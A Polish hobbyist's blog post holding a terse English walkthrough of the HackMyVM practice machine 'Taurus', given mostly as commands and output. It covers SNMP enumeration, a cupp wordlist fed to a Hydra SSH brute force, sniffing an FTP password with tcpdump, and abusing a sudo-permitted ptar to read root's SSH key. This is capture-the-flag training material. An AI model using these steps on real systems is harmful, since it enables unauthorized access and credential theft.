Marcin

Marcin

Zajmuję się komputerami od lat 90. (XX wieku). Najpierw był C64, potem Amiga, a od 25 lat PC. Tematy tutaj poruszane będą różne, ale głównie związane z IT i wycieczkami rowerowymi.

Taurus by Cromiphi

No comments, just write-up.

00. Metainfo

Title: Taurus
Author: Cromiphi
Release date: 2021-10-18
Download from: HackMyVM
Level: Medium
System: Linux
You’ll learn: Port scan, Generate passwords, Network traffic

01. Metasploit and scan

msf6 exploit(multi/http/wp_file_manager_rce) > db_nmap -sT -sU 172.16.1.171
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-19 10:46 CEST
[*] Nmap: Nmap scan report for taurus.lan (172.16.1.171)
[*] Nmap: Host is up (0.00043s latency).
[*] Nmap: Not shown: 1996 closed ports
[*] Nmap: PORT    STATE         SERVICE
[*] Nmap: 21/tcp  open          ftp
[*] Nmap: 22/tcp  open          ssh
[*] Nmap: 68/udp  open|filtered dhcpc
[*] Nmap: 161/udp open|filtered snmp
[*] Nmap: MAC Address: 52:54:5E:30:B8:07 (Unknown)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 1085.76 seconds

02. SNMP

# root@kali:/home/szikers/taurus# snmp-check 172.16.1.171
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 172.16.1.171:161 using SNMPv1 and community 'public'

[*] System information:

  Host IP address               : 172.16.1.171
  Hostname                      : "I Love My Name, Don't You, Little Hackers ?"
  Description                   : Linux taurus 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64
  Contact                       : Sarah <sarah@hmv.org>
  Location                      : Unknown
  Uptime snmp                   : 00:53:31.89
  Uptime system                 : 00:53:26.36
  System date                   : 2021-10-19 11:28:51.0

03. Cupp

# root@kali:/home/szikers/taurus# cupp -i
 ___________
   cupp.py!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\
              ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]
                            [ Mebus | https://github.com/Mebus/]


[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: sarah
> Surname:
> Nickname:
> Birthdate (DDMMYYYY):


> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):


> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):


> Pet's name:
> Company name:


> Do you want to add some key words about the victim? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to sarah.txt, counting 108 words.
[+] Now load your pistolero with sarah.txt and shoot! Good luck!

04. Hydra

root@kali:/home/szikers/taurus# hydra -t64 -T64 -V ssh://172.16.1.171 -l sarah -P sarah.txt
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-19 13:19:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 108 login tries (l:1/p:108), ~2 tries per task
[DATA] attacking ssh://172.16.1.171:22/
[ATTEMPT] target 172.16.1.171 - login "sarah" - pass "Sarah2008" - 1 of 108 [child 0] (0/0)
[ATTEMPT] target 172.16.1.171 - login "sarah" - pass "Sarah2009" - 2 of 108 [child 1] (0/0)
[ATTEMPT] target 172.16.1.171 - login "sarah" - pass "Sarah2010" - 3 of 108 [child 2] (0/0)
[ATTEMPT] target 172.16.1.171 - login "sarah" - pass "Sarah2011" - 4 of 108 [child 3] (0/0)
[ATTEMPT] target 172.16.1.171 - login "sarah" - pass "Sarah2012" - 5 of 108 [child 4] (0/0)
[ATTEMPT] target 172.16.1.171 - login "sarah" - pass "Sarah2013" - 6 of 108 [child 5] (0/0)
[ATTEMPT] target 172.16.1.171 - login "sarah" - pass "Sarah2014" - 7 of 108 [child 6] (0/0)
[ATTEMPT] target 172.16.1.171 - login "sarah" - pass "Sarah2015" - 8 of 108 [child 7] (0/0)
....
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 44 final worker threads did not complete until end.
[ERROR] 44 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-19 13:19:50

05. Tcpdump

console number 1

# sarah@taurus:/opt$ sudo -u marion /usr/bin/bash /opt/ftp

console number 2

# sarah@taurus:~$ tcpdump -A -s 10240 -i lo
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on lo, link-type EN10MB (Ethernet), snapshot length 10240 bytes
...
12:22:15.606139 IP6 localhost.48382 > localhost.ftp: Flags [S], seq 1321325692, win 65476, options [mss 65476,sackOK,TS val 
12:22:15.608045 IP6 localhost.48382 > localhost.ftp: Flags [.], ack 70, win 512, options [nop,nop,TS val 1925689983 ecr 1925689983], length 0
r...r...
12:22:15.608063 IP6 localhost.48382 > localhost.ftp: Flags [P.], seq 14:32, ack 70, win 512, options [nop,nop,TS val 1925689983 ecr 1925689983], length 18: FTP: PASS [obscuffed be me]
r...r...PASS [obscuffed be me]
12:22:15.608070 IP6 localhost.ftp > localhost.48382: Flags [.], ack 32, win 512, options [nop,nop,TS val 1925689983 ecr 1925689983], length 0
...

06. Ptar and Root

# marion@taurus:/opt$ sudo -l
Matching Defaults entries for marion on taurus:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User marion may run the following commands on taurus:
    (ALL : ALL) NOPASSWD: /usr/bin/ptar

# marion@taurus:/opt$ cd /tmp/
# marion@taurus:/tmp$ sudo /usr/bin/ptar -cf user.tar /home/marion
# marion@taurus:/tmp$ sudo /usr/bin/ptar -cf root.tar /root

# marion@taurus:/tmp$ sudo /usr/bin/ptar -t -f root.tar
/root
/root/.bashrc
/root/root.txt
/root/.profile
/root/.bash_history
/root/.local
/root/.local/share
/root/.local/share/nano
/root/.ssh
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
# marion@taurus:/tmp$
# marion@taurus:/tmp$ tar -xf root.tar -C /tmp/
tar: Removing leading `//' from member names
tar: Removing leading `/' from member names
# marion@taurus:/tmp$ cd root
# marion@taurus:/tmp/root$ ls -la
total 28
drwx------  4 marion marion 4096 Oct 16 21:17 .
drwxrwxrwt 10 root   root   4096 Oct 19 12:53 ..
lrwxrwxrwx  1 marion marion    9 Oct 16 19:56 .bash_history -> /dev/null
-rw-r--r--  1 marion marion  571 Apr 10  2021 .bashrc
drwxr-xr-x  3 marion marion 4096 Oct 16 08:56 .local
-rw-r--r--  1 marion marion  161 Jul  9  2019 .profile
-rwx------  1 marion marion   33 Oct 16 21:17 root.txt
drwx------  2 marion marion 4096 Oct 16 21:03 .ssh
# marion@taurus:/tmp/root$ cd .ssh/
# marion@taurus:/tmp/root/.ssh$ ssh -i id_rsa root@localhost
Linux taurus 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Oct 19 12:49:16 2021 from ::1
# root@taurus:~# id
uid=0(root) gid=0(root) groups=0(root)

Zostaw komentarz

Także może Ci się spodobać